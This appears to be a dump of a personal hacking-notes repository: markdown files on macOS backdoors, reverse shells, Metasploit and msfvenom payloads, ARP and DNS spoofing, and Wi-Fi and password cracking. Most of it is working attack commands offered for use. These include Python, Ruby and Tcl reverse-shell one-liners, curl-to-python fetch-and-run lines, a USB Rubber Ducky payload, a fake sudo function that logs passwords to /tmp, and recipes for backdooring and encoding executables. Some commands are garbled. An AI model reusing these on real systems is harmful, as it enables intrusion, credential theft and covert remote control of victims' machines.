| rm mycron 45 | 46 | Elevate the File Permissions: 47 | 48 | chmod 777 /etc/payload 49 | 50 | Shutdown the Mac: 51 | 52 | shutdown -h now 53 | 54 | --------------------------------------------------------------------- 55 | 56 | Connect to the Backdoored Mac: 57 | 58 | nmap -p1234,65534 -O 192.168.0.1/24 (search ip of MacOs) 59 | 60 | nc 192.168.0.65 1234 (on kali) 61 | 62 | Fix the Misconfigured Source File: 63 | 64 | After establishing a connection to the Netcat listener, the shell will likely be primitive with no knowledge of where programs are located on the OS. For example, using ifconfig to view interfaces fails with "ifconfig: command not found." 65 | 66 | To fix this, use the below source command: 67 | 68 | source /etc/profile 69 | 70 | Post exploitation: 71 | 72 | system_profiler 73 | uname 74 | etc... 75 | 76 | We can use a server (ex: VPS) to perform this attack. In that case we don't need to be on the same network and we have to set the IP of the server directly on the bash script because we know the IP and this one never change. 77 | -------------------------------------------------------------------------------- /system/exploitation/payloads/python.md: -------------------------------------------------------------------------------- 1 | Netcat & Payload: 2 | 3 | Option 1: 4 | 5 | Create an indetectable payload in python and use it to get a shell on every macos system: 6 | 7 | nc -l -p 8080 (listening on kali) 8 | 9 | Create a python payload: 10 | 11 | nano payload.py (and paste the script changing the ip) 12 | 13 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); 14 | 15 | Then, just have to execute that script on macos computer. 16 | 17 | Option 2: 18 | 19 | An other option is to send the script online with a pastebin web service: 20 | 21 | https://pastebin.com 22 | 23 | And execute this command on the macos computer: 24 | 25 | curl https://pastebin.com/raw/TAM2q3rW | python & 26 | 27 | Option 3: 28 | 29 | Execute file from computer on same network. 30 | 31 | sudo curl http://192.168.0.110/reverse_tcp.py | sudo python & 32 | 33 | Or copy all necessary files on the computer you attack and execute it. 34 | 35 | curl http://192.168.0.110/reverse_tcp.py > /tmp/reverse_tcp.py 36 | sudo python /tmp/reverse_tcp.py 37 | 38 | Option 4: 39 | 40 | Create a MacOs application to run the script on background with platypus: 41 | 42 | https://sveinbjorn.org/platypus 43 | -------------------------------------------------------------------------------- /system/exploitation/payloads/ruby.md: -------------------------------------------------------------------------------- 1 | Same attack like other script language, can be insert in a file or a pastebin web application. 2 | 3 | nc -l -p 8080 (on kali) 4 | 5 | ruby -rsocket -e "c=TCPSocket.new('1.2.3.4','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end" 6 | 7 | This one-liner above will create a TCP socket (TCPSocket.new) and a while loop (while ... end) that says "while there's data coming in, assign it to cmd, run the input as a shell command, and print it back in our terminal (IO.popen(cmd,'r'){|io|c.print io.read})." Essentially, we're telling Ruby to take the command we submit, execute it, interpret the output, and send it back to us ... over and over again until we break the connection to the macOS device. 8 | 9 | Remember to change the IP address (1.2.3.4) and port number (9999) to match the Netcat listener created in the previous step. This can be a local network IP address or IP address of your VPS. On the attacker's system (as shown below), the Netcat terminal will show a new connection was established. 10 | -------------------------------------------------------------------------------- /system/exploitation/payloads/tclsh.md: -------------------------------------------------------------------------------- 1 | As mentioned, creating Netcat backdoors can be established with minimal characters, making it the ideal method for quickly getting remote access to a Mac desktop or laptop. However, if the MacBook or other macOS device suddenly goes to sleep, locks, or the Wi-Fi connection is lost while the attacker is issuing remote commands, the Netcat process may become frozen and fail to terminate; This ultimately leaves the attacker with no new way to remotely access the device. 2 | 3 | Fortunately, Tclsh handles sudden disconnections gracefully and is already present in all macOS devices. If you're a macOS user, you can test this by opening a Terminal and typing tclsh. You'll find that ls and ifconfig function as expected. 4 | 5 | Start a Netcat Listener: 6 | 7 | nc -l -p 9999 (on mac) 8 | 9 | Execute the Tclsh Command: 10 | 11 | echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh & 12 | 13 | Rubber Ducky Payloads: (optional) 14 | 15 | Let's focus on using a USB Rubber Ducky to execute the command where a few seconds of physical access is possible. Below is an example payload. 16 | 17 | Rubber Ducky Script: 18 | 19 | DELAY 1500 20 | GUI SPACE 21 | DELAY 350 22 | STRING terminal 23 | DELAY 100 24 | ENTER 25 | DELAY 1000 26 | STRING echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh & 27 | ENTER 28 | GUI q -------------------------------------------------------------------------------- /system/exploitation/reverse_shells.md: -------------------------------------------------------------------------------- 1 | # Reverse Shell Commands 2 | The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems. 3 | 4 | ## Netcat Linux Reverse Shell 5 | `nc 10.10.10.10 888 -e /bin/sh` 6 | * 10.10.10.10 is the IP address of the machine you want the victim to connect to. 7 | * 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it). 8 | 9 | ## Netcat Linux Reverse Shell 10 | `nc 10.10.10.10 888 -e cmd.exe` 11 | * 10.10.10.10 is the IP address of the machine you want the victim to connect to. 12 | * 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it). 13 | 14 | ## Using Bash 15 | `bash -i & /dev/tcp/10.10.10.10/888 0 &1` 16 | 17 | ## Using Python 18 | `python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'` 19 | 20 | ## Using Ruby 21 | `ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'` 22 | -------------------------------------------------------------------------------- /system/exploitation/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.110",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); 2 | -------------------------------------------------------------------------------- /system/exploitation/sudo.sh: -------------------------------------------------------------------------------- 1 | function sudo (){ 2 | rs="$(which sudo)"; 3 | read -s -p "Password: " input; 4 | printf "\n"; 5 | printf '%s\n' "$USER : $input" > /tmp/sudo; 6 | $rs -S -u root bash -c "exit" <<< "$input" > /dev/null 2>&1; 7 | $rs "${@:1}" 8 | } -------------------------------------------------------------------------------- /tools/brute_force/wpscan.md: -------------------------------------------------------------------------------- 1 | Brute Force The WordPress Admin Account Password: 2 | 3 | wpscan -url targetwordpressurl.com -wordlist /usr/share/wordlists/rockyou.txt -username admin -threads 2 4 | 5 | -wordlist: replace wordlist and location with your choice 6 | -username: your target’s username 7 | -threads: replace the number of threads you would like to use -------------------------------------------------------------------------------- /tools/john.md: -------------------------------------------------------------------------------- 1 | To show the types of passwords that John can crack with crack speed (in cracks/second) 2 | 3 | john --test 4 | 5 | To use your own word list (the Rockyou list is suggested) 6 | 7 | john --wordlist=[filename] [passwordfile] 8 | 9 | To show your results after running john (shows ~/.john/john.pot) 10 | 11 | john --show 12 | 13 | To restore an interrupted john session 14 | 15 | john --restore -------------------------------------------------------------------------------- /tools/metasploit.md: -------------------------------------------------------------------------------- 1 | cd /usr/share/metasploit-framework 2 | 3 | Maintain Database: 4 | 5 | - msfdb 6 | - msfdb init 7 | - msfdb delete 8 | - msfdb reinit 9 | 10 | Create workspace: 11 | 12 | - workspace -h 13 | - workspace -a project (add & select) 14 | - workspace -d project (delete & select default) 15 | - workspace project (change) 16 | 17 | - creds (check credentials) 18 | 19 | Create Payloads: 20 | 21 | - msfpc Python 192.168.0.137 8080 22 | 23 | msfpc use msfvenom to create payload and give you a file to execute msfconsole easily. 24 | 25 | - msfvenom -l 26 | - msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.116 lport=8888 > reverce_tcp.py 27 | 28 | - msfvenom + template 29 | 30 | - shellter + template 31 | 32 | - veil 33 | 34 | Use Exploits: 35 | 36 | - use exploit/multi/handler 37 | - options 38 | 39 | - set payload python/meterpreter/reverse_tcp 40 | - set lhost 192.168.0.116 41 | - set lport 8888 42 | 43 | - run 44 | 45 | Install on Mac OS: 46 | 47 | - here is the download for Mac 48 | 49 | cd /opt/metasploit-framework/bin/ -------------------------------------------------------------------------------- /tools/mitm/ARP Spoofing & Bettercap.md: -------------------------------------------------------------------------------- 1 | Perform ARP spoofing attack: 2 | 3 | sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward' 4 | 5 | sudo bettercap 6 | set arp.spoof.targets 10.0.2.4 7 | set arp.spoof.fullduplex true 8 | arp.spoof on 9 | 10 | Create a script: 11 | 12 | nano myscript.py 13 | 14 | function onResponse(req, res) { 15 | if( res.ContentType.indexOf('text/html') == 0 ){ 16 | var body = res.ReadBody(); 17 | if( body.indexOf('') != -1 ) { 18 | res.Body = body.replace( 19 | '', 20 | '' 21 | ); 22 | } 23 | } 24 | } 25 | 26 | Inject the script on the proxy: 27 | 28 | set http.proxy.script /home/user/Desktop/myscript.py 29 | set http.proxy.sslstrip true 30 | http.proxy on -------------------------------------------------------------------------------- /tools/mitm/ARP Spoofing & MITM Proxy.md: -------------------------------------------------------------------------------- 1 | Listen network: 2 | 3 | Redirect http and https traffic to port 8080: 4 | 5 | echo "1" > /proc/sys/net/ipv4/ip_forward 6 | 7 | net.probe on 8 | 9 | Active ARP spoofing: 10 | 11 | sudo bettercap 12 | set arp.spoof.targets 10.0.2.4 13 | set arp.spoof.fullduplex true 14 | arp.spoof on 15 | 16 | Active MITM listening: 17 | 18 | set net.sniff.verbose false 19 | net.sniff on 20 | 21 | Active proxy: 22 | 23 | set http.proxy.sslstrip true 24 | http.proxy on 25 | -------------------------------------------------------------------------------- /tools/mitm/ARP Spoofing & MITM.md: -------------------------------------------------------------------------------- 1 | Listen network: 2 | 3 | Redirect http and https traffic to port 8080: 4 | 5 | iptables -t nat -F 6 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 7 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 8 | sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward' 9 | echo "1" > /proc/sys/net/ipv6/conf/all/forwarding 10 | echo "0" > /proc/sys/net/ipv4/conf/all/send_redirects 11 | 12 | Active ARP spoofing: 13 | 14 | bettercap 15 | set arp.spoof.targets 10.0.2.4 16 | set arp.spoof.fullduplex true 17 | arp.spoof on 18 | 19 | Active MITM listening: 20 | 21 | mitmproxy --mode transparent --listen-host 10.0.2.5 #kali ip 22 | 23 | Mitmdump & Beef: 24 | 25 | Creation and injection Python: 26 | 27 | nano myscript.py 28 | 29 | from mitmproxy import http 30 | 31 | def response(flow: http.HTTPFlow): 32 | reflector = b"HACKED" 33 | flow.response.content = flow.response.content.replace(b"Science", reflector) 34 | 35 | mitmdump -s myscript.py --mode transparent --listen-host 10.0.0.4 --anticache 36 | 37 | Install and use browser with beef: 38 | 39 | nano myscript.py 40 | 41 | from mitmproxy import http 42 | 43 | def response(flow: http.HTTPFlow): 44 | reflector = bytes("", "UTF-8") 45 | flow.response.content = flow.response.content.replace(b"", reflector) 46 | 47 | mitmdump -s myscript.py --mode transparent --listen-host 10.0.0.4 --anticache 48 | 49 | Bettercap: 50 | 51 | net.show 52 | net.probe on 53 | net.show 54 | ticker on 55 | 56 | bettercap -T 10.1.1.12 57 | 58 | https://www.kalitut.com/2019/04/how-to-install-and-use-bettercap.html 59 | 60 | https://github.com/aancw/bettercap-ng/blob/master/caplets/beef-inject.js 61 | -------------------------------------------------------------------------------- /tools/mitm/DNS Spoofing & MITM.md: -------------------------------------------------------------------------------- 1 | Perform ARP spoofing attack: 2 | 3 | echo 1 > /proc/sys/net/ipv4/ip_forward 4 | 5 | set arp.spoof.targets 192.168.5.99 6 | 7 | Perform DNS spoofing attack: 8 | 9 | set dns.spoof.domains 2fa.tavanoapps.com 10 | set dns.spoof.all true 11 | dns.spoof on 12 | 13 | Active web server: 14 | 15 | set http.server.path /var/www/html 16 | http.server on 17 | -------------------------------------------------------------------------------- /tools/msfvenom.md: -------------------------------------------------------------------------------- 1 | # MSFVenom 2 | 3 | MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. 4 | 5 | ## Creating Binaries 6 | 7 | Creates a simple TCP Payload for Windows 8 | 9 | msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 10 | 11 | Creates a simple HTTP Payload for Windows 12 | 13 | msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 14 | 15 | Creates a simple TCP Shell for Linux 16 | 17 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf 18 | 19 | Creates a simple TCP Shell for Mac 20 | 21 | msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho 22 | 23 | Creates a simple TCP Payload for Android 24 | 25 | msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk 26 | 27 | ## Web Payloads 28 | 29 | Creates a Simple TCP Shell for PHP 30 | 31 | msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php 32 | 33 | Creates a Simple TCP Shell for ASP 34 | 35 | msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp 36 | 37 | Creates a Simple TCP Shell for Javascript 38 | 39 | msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp 40 | 41 | Creates a Simple TCP Shell for WAR 42 | 43 | msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war 44 | 45 | 46 | ## Windows Payloads 47 | 48 | Lists all avalaible encoders 49 | 50 | msfvenom -l encoders 51 | 52 | Binds an exe with a Payload (Backdoors an exe) 53 | 54 | msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 55 | 56 | Creates a simple TCP payload with shikata_ga_nai encoder 57 | 58 | msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe 59 | 60 | Binds an exe with a Payload and encodes it 61 | 62 | msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe 63 | 64 | ## Getting a Metepreter Shell 65 | ``` 66 | omar@ares:~$ sudo msfconsole 67 | msf > use exploit/multi/handler 68 | msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 69 | payload => windows/meterpreter/reverse_tcp 70 | msf exploit(multi/handler) > set lhost 192.168.1.123 71 | lhost => 192.168.1.123 72 | msf exploit(multi/handler) > set lport 4444 73 | lport => 4444 74 | msf exploit(multi/handler) > run 75 | ``` 76 | -------------------------------------------------------------------------------- /tools/network_scan/netdiscover.md: -------------------------------------------------------------------------------- 1 | Scan: 2 | 3 | netdiscover -i wlan0 4 | 5 | netdiscover -S -iwlan0 6 | -------------------------------------------------------------------------------- /tools/network_scan/openvas.md: -------------------------------------------------------------------------------- 1 | Vulnerability scanning is a crucial phase of a penetration test and having an updated vulnerability scanner in your security toolkit can often make a real difference by helping you discover overlooked vulnerable items. For this reason, we’ve manually packaged the latest and newly released OpenVAS 8.0 tool and libraries for Kali Linux. Although nothing major has changed in this release in terms of running the vulnerability scanner, we wanted to give a quick overview on how to get it up and running. 2 | 3 | # apt-get update 4 | # apt-get dist-upgrade 5 | 6 | # apt-get install openvas 7 | # openvas-setup 8 | # openvas-start 9 | 10 | To change the web login : 11 | 12 | openvasmd --create-user NEWUSER 13 | 14 | It will automatically generate a password for the new user. 15 | 16 | Use this new account to modify the admin password. 17 | 18 | To remove the 'junk / false' account just enter 19 | 20 | openvasmd --delete-user=NEWUSER 21 | 22 | or do so in the WebUI. 23 | 24 | https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/ 25 | http://serverfault.com/questions/563815/reset-admin-password-of-openvas -------------------------------------------------------------------------------- /tools/python.md: -------------------------------------------------------------------------------- 1 | Network Programming Basics (Python) 2 | 3 | 4 | To use the socket module 5 | 6 | import socket 7 | 8 | To create a new socket object 9 | 10 | sock = socket.socket() 11 | 12 | To get your local machine's name 13 | 14 | host = socket.gethostname() 15 | 16 | To declare a port for your service 17 | 18 | port = 80 19 | 20 | To bind a (hostname, port number) pair to a socket 21 | 22 | sock.bind(host, port) 23 | 24 | To set up and start a TCP listener (wait for client connection) 25 | 26 | sock.listen() 27 | 28 | To accept a connection 29 | 30 | Note: accept() returns a (conn, address) pair where conn is a new socket object that can be used to send/receive 31 | data on the connection. Address refers to the address bound on the other end of the connection. 32 | 33 | connection, address = sock.accept() 34 | 35 | To transmit a TCP message (continuing from previous example) 36 | 37 | connection.send('Message goes here') 38 | 39 | To transmit a UDP message 40 | 41 | Note: the socket should not be connected to a remote socket because we are specifying the destination address 42 | 43 | connection.sendto('Message goes here', destination_address) 44 | 45 | To close the connection 46 | 47 | connection.close() 48 | 49 | To receive TCP data from a socket (assuming s is the socket on the client side). 1024 is the buffer size and data is a string. 50 | 51 | data = s.recv(1024) 52 | 53 | To receive UDP data from a socket 54 | 55 | Note: recvfrom() returns a (string, address) pair, where string is the data received and address represents the address of the socket from which the message was sent. 56 | 57 | data, addr = s.recvfrom() 58 | 59 | To get a remote address that a socket is connected to 60 | 61 | sock.getpeername() 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /tools/tcpdump.md: -------------------------------------------------------------------------------- 1 | # Useful `tcpdump` commands 2 | 3 | ### TCPDUMP Cheat Sheet 4 | * [TCPDUMP Cheat Sheet](http://packetlife.net/media/library/12/tcpdump.pdf) is a good resource (I also have a local copy in this repository) 5 | 6 | ### TCP traffic on port 80-88 7 | `tcpdump -nvvX -sO -i ethO tcp portrange 80-88` 8 | 9 | ### Capturing traffic to specific IP address excluding specific subnet 10 | `tcpdump -I ethO -tttt dst ip and not net 10.10.10.0/24` 11 | 12 | ### Capturing traffic for a specific host 13 | `tcpdump host 10.1.1.1` 14 | 15 | ### Capturing traffic for a specific subnet 16 | `tcpdump net 10.1.1` 17 | 18 | ### Capturing traffic for a given duration in seconds 19 | `dumpcap -I ethO -a duration: sec -w file myfile.pcap` 20 | 21 | ### Replaying a PCAP 22 | `file2cable -i ethO -f file.pcap` 23 | 24 | ### Replaying packets (to fuzz/DoS) 25 | `tcpreplay--topspeed --loop=O --intf=ethO pcap_file_to_replay mbps=10|100|1000 26 | 27 | 28 | ------- 29 | 30 | # alex 31 | 32 | ############### 33 | # Basic Usage # 34 | ############### 35 | 36 | #Capture packets on a particular interface (eth0) 37 | #Note that tcpdump (without the '-i eth0') is also valid if you are only using one interface 38 | tcpdump -i eth0 39 | 40 | #Capture packets with more detailed output 41 | tcpdump -i eth0 -nnvvS 42 | 43 | #Display captured packets in both HEX and ASCII format 44 | tcpdump -XX -i eth0 45 | 46 | #Write captured packets into a file (can be read by tools such as Wireshark, Snort, etc) 47 | tcpdump -w yourfilename.pcap -i eth0 48 | 49 | #Read packets from a saved packet capture file 50 | tcpdump -tttt -r yoursavedfile.pcap 51 | 52 | #Display IP addresses instead of hostnames when capturing packets 53 | tcpdump -n -i eth0 54 | 55 | #Capture packets from a particular source/destination IP address 56 | tcpdump src 192.168.1.1 57 | tcpdump dst 192.168.1.1 58 | 59 | #Capture packets from a particular source/destination port number 60 | tcpdump src port 53 61 | tcpdump dst port 21 62 | 63 | #Capture an entire network's traffic using CIDR notation 64 | tcpdump net 192.168.1.0/24 65 | 66 | #Capture traffic to or from a port 67 | tcpdump port 3389 68 | 69 | #Display captured packets above or below a certain size (in bytes) 70 | tcpdump less 64 71 | tcpdump greater 256 72 | 73 | 74 | ################## 75 | # Advanced Usage # 76 | ################## 77 | 78 | #More complex statements can be formed with the use of logical operators: and(&&), or(||), not(!) 79 | #Examples: 80 | 81 | #Capture all traffic from 192.168.1.10 with destination port 80 (with verbose output) 82 | tcpdump -nnvvS and src 192.168.1.10 and dst port 80 83 | 84 | #Capture traffic originating from the 172.16.0.0/16 network with destination network 192.168.1.0/24 or 10.0.0.0/8 85 | tcpdump src net 172.16.0.0/16 and dst net 192.168.1.0/24 or 10.0.0.0/8 86 | 87 | #Capture all traffic originating from host H1 that isn't going to port 53 88 | tcpdump src H1 and not dst port 22 89 | 90 | #With some complex queries you may have to use single quotes to ignore special characters, namely parentheses 91 | #Capture traffic from 192.168.1.1 that is destined for ports 80 and 21 92 | tcpdump 'src 192.168.1.1 and (dst port 80 or 21)' -------------------------------------------------------------------------------- /tools/web/web_vulnerabilities.md: -------------------------------------------------------------------------------- 1 | ## Mantra browser: 2 | 3 | Mantra is a firefox navigator with lot of plugins used to perform penetration tests. 4 | 5 | ## OWASP: 6 | 7 | Owasp is a proxy like Burp. Have a spider feature (not in burp free version). 8 | 9 | Used to scan website and search about vulnerabilities, injections. 10 | 11 | ## BURP: 12 | 13 | Burp is a proxy for website analisis, can perform bruteforce attack, modify requests, etc. 14 | 15 | Burp active his proxy on port 8080. 16 | Configure this proxy on browser. 17 | 18 | ## Nikto: 19 | 20 | Search for web vulnerabilities on a server. 21 | 22 | nikto -h 10.1.1.12 (default) -------------------------------------------------------------------------------- /tools/wireshark.md: -------------------------------------------------------------------------------- 1 | Basic: 2 | 3 | 1) Try to get EAPOL packets, this packets contains the handshakes. 4 | 5 | We can change the network scanning channel if we need. (add WI-FI toolbar to change easily) 6 | 7 | 2) If you have handshakes, go to preferences, protocols, ieee 802.11 and add tha wpa-psk key in order to decrypt all the traffic for every interface on the network. 8 | 9 | 3) Scan for DNS request and watch all traffic from computers and smartphones. 10 | 11 | Open statistics, resolved adresses, to show all the DNS resolutions. 12 | 13 | 4) Search for HTTP request (and POST) and examine packets to find credentials, conversations, etc. 14 | 15 | - http.host == "192.168.0.110:8080" 16 | 17 | Sniffing the network: 18 | 19 | airmon-ng start wlan0 20 | airodump-ng start wlan0 21 | 22 | Start wireshark on wlan0mon and capture handshakes with one of these two commands: 23 | 24 | aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon 25 | mdk3 wlan0mon 26 | 27 | Search on wireshark for desauthentification packets and EAPOL packets and then, continu the "Basic" process of capturing explained before. 28 | -------------------------------------------------------------------------------- /tools/wordlists/cewl.md: -------------------------------------------------------------------------------- 1 | # CEWL 2 | 3 | Create wordlists from website: 4 | 5 | cewl.rb https://www.website.com -w file.txt 6 | 7 | cewl http://netsec.ws/ -d 1 -m 6 -w netsec.txt 8 | 9 | d: number of link 10 | m: min word lenght 11 | 12 | To spider a site and write all found words to a file 13 | 14 | cewl -w 15 | 16 | To spider a site and follow links to other sites 17 | 18 | cewl -o 19 | 20 | To spider a site using a given user-agent 21 | 22 | cewl -u 23 | 24 | To spider a site for a given depth and minimum word length 25 | 26 | cewl -d -m 27 | 28 | To spider a site and include a count for each word 29 | 30 | cewl -c 31 | 32 | To spider a site inluding meta data and separate the meta_data words 33 | 34 | cewl -a -meta_file 35 | 36 | To spider a site and store email adresses in a separate file 37 | 38 | cewl -e -email_file -------------------------------------------------------------------------------- /tools/wordlists/cupp.md: -------------------------------------------------------------------------------- 1 | # CUPP 2 | 3 | Interactive Worldlist for Peoples. 4 | 5 | Help: 6 | 7 | cupppython3 cupp.py -h 8 | 9 | Interactive: 10 | 11 | python3 cupp.py -i -------------------------------------------------------------------------------- /tools/wordlists/wordlists.md: -------------------------------------------------------------------------------- 1 | https://wiki.skullsecurity.org/Passwords 2 | 3 | http://contest-2010.korelogic.com/wordlists.html 4 | 5 | https://weakpass.com/wordlist 6 | 7 | ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/ -------------------------------------------------------------------------------- /wifi/crack.md: -------------------------------------------------------------------------------- 1 | # Wifi Crack 2 | 3 | ## Aircrack: (Hash) 4 | 5 | aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk\*.cap 6 | 7 | ## Reaver: (PSK) 8 | 9 | reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv 10 | reaver -i wlan0mon -b -c -K 1 -vv 11 | 12 | ## Crunch & Aircrack: 13 | 14 | crunch 8 8 0123456789 -s 00000000 -e 99999999 | aircrack -e test proof.cap -w - 15 | 16 | Use john to keep a session of aircrack when used with huge wordlist: 17 | 18 | crunch 8 8 | john --stdin --wordlist=password.lst --stdout --session=sessname | aircrack-ng -b C0:25:E9:62:CE:E5 psk-01.cap -w - 19 | 20 | 21 | ## John & Aircrack: 22 | 23 | john --wordlist=password.lst --rules=Jumbo --stdout | aircrack-ng -b C0:25:E9:62:CE:E5 psk-01.cap -w - 24 | 25 | Use john to keep a session of aircrack when used with huge wordlist: 26 | 27 | john --wordlist=password.lst --rules=Jumbo --stdout --session=sessname | aircrack-ng -b C0:25:E9:62:CE:E5 psk-01.cap -w - 28 | 29 | https://wpa-sec.stanev.org/ 30 | https://github.com/danielmiessler/SecLists 31 | 32 | ## Pyrit: 33 | 34 | Pyrit is one of the fastest tools available for WPA password-cracking out there. 35 | 36 | One helpful tool is the strip command, which strips down long capture files to only include relevant packets. And then there's the verify option that lets Pyrit confirm results via recomputation. 37 | 38 | Pyrit also has several features to import multiple password lists into a large database. To prevent duplicates, the import_unique_passwords command can also strip out passwords that appear multiple times in the same file we're trying to import. After we import passwords to the database, we can start cracking them with the attack_batch option. 39 | 40 | Download a Password List & Benchmark System: 41 | 42 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt 43 | 44 | pyrit benchmark (benchmark our system) 45 | 46 | pyrit -i '/root/Desktop/probable-v2-wpa-top4800.txt' import_passwords (import passwords to the database) 47 | 48 | Capture handshakes: 49 | 50 | airmon-ng start wlan0 51 | airodump-ng wlan0mon -c 3 -w capture 52 | pyrit -r '/root/Desktop/capture-01.cap' analyze (analyse captured file to show if we have a valid handshake) 53 | 54 | Final command: 55 | 56 | pyrit -r capture.pcap -o savedpass attack_batch 57 | 58 | ## Hxctools & Hashcat 59 | 60 | In this case we use Hxctools & Hashcat to capture packets and crack the password but we can do that automaticaly with wifite, if the necessary softwares are installed Wifite will automaticaly use them and give us a URL to upload the modified handshakes. Then the password cracking is performed from connected server online using different password lists. 61 | 62 | Install Hxctools & Hashcat: 63 | 64 | sudo apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev 65 | 66 | MacOs Install: 67 | 68 | brew install hashcat hxctools 69 | 70 | On your Git folder: 71 | 72 | git clone https://github.com/ZerBea/hcxdumptool.git 73 | cd hcxdumptool 74 | sudo make 75 | sudo make install 76 | 77 | On your Git folder: 78 | 79 | git clone https://github.com/ZerBea/hcxtools.git 80 | cd hcxtools 81 | sudo make 82 | sudo make install 83 | 84 | apt install hashcat 85 | 86 | Use Hxcdump to Capture PMKIDs from Local Networks 87 | 88 | airmon-ng start wlan0 89 | 90 | hcxdumptool -i wlan0mon -o capture.pcapng --enable__status=1 91 | 92 | -i tells the program which interface we are using, in this case, wlan0mon. The filename we'll be saving the results to can be specified with the -o flag argument. The channel we want to scan on can be indicated with the -c flag followed by the number of the channel to scan. 93 | 94 | Use Hxcpcaptool to Convert the Dump for Hashcat: 95 | 96 | To convert our PCAPNG file, we'll use hcxpcaptool with a few arguments specified. In the same folder that your .PCAPNG file is saved, run the following command in a terminal window. 97 | 98 | hcxpcaptool -z hash capture.pcapng 99 | 100 | hcxpcaptool -E essidlist -I identitylist -U usernamelist -z hash capture.pcapng 101 | 102 | This command is telling hxcpcaptool to use the information included in the file to help Hashcat understand it with the -E, -I, and -U flags. The -Z flag is used for the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert. 103 | 104 | Select a Password List & Brute Force with Hashcat: 105 | 106 | hashcat -m 16800 --force hash /home/user/Downloads/rockyou.txt.txt -w 4 -a 0 107 | 108 | hashcat -m 16800 --force hash /home/user/Downloads/rockyou.txt.txt > out.txt 109 | 110 | hashcat -m 16800 --force hash /home/user/Downloads/rockyou.txt.txt --show 111 | 112 | New: 113 | 114 | hashcat -m 22000 -a 3 --session session_name /Users/nicolasgrimonpont/Hash '?1?1?1?1?1?1?1?1' -1 '?l?u?d' 115 | 116 | This is a mask attack: 117 | - m 22000 (new WPA algo) 118 | - '?1?1?1?1?1?1?1?1' (mask lenght) 119 | - -1 '?l?u?d' (custom rule 1) uppercase, lowercase, digit 120 | 121 | - '?2?2?2?2?2?2?2?2' (mask lenght) 122 | - -2 '?l?u?d' (custom rule 2) uppercase, lowercase, digit 123 | 124 | 125 | In this command, we are starting Hashcat in 16800 mode, which is for attacking WPA-PMKID-PBKDF2 network protocols. Next, we'll specify the name of the file we want to crack, in this case, "HC.16800." The -a flag tells us which types of attack to use, in this case, a "straight" attack, and then the -w and --kernel-accel=1 flags specifies the highest performance 